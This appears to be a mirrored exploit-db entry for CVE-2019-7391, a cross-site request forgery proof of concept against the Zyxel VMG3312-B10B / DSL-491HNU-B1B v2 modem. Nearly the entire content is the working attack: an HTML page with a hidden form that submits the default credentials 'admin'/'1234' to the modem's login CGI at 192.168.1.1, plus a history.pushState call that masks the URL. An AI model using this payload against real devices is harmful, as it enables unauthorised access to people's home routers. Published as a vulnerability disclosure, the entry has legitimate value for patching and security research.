Zyxel VMG3312-B10B DSL-491HNU-B1B v2 Modem – Cross-Site Request Forgery

  • 作者: Yusuf Furkan
    日期: 2019-02-05
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/46326/
  • # Exploit Title: Zyxel VMG3312-B10B DSL-491HNU-B1B v2 modem CSRF Exploit
    # Version: Zyxel VMG3312-B10B
    # Tested on : Parrot Os
    # Author: Yusuf Furkan
    # Twitter: h1_yusuf
    # CVE: CVE-2019-7391
    # model name: DSL-491HNU-B1B v2
    
    <html>
    <!-- CSRF PoC - generated by Yusuf -->
    <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.1.1/login/login-page.cgi" method="POST">
    <input type="hidden" name="AuthName" value="admin" />
    <input type="hidden" name="AuthPassword" value="1234" />
    <input type="submit" value="Submit request" />
    </form>
    </body>
    </html>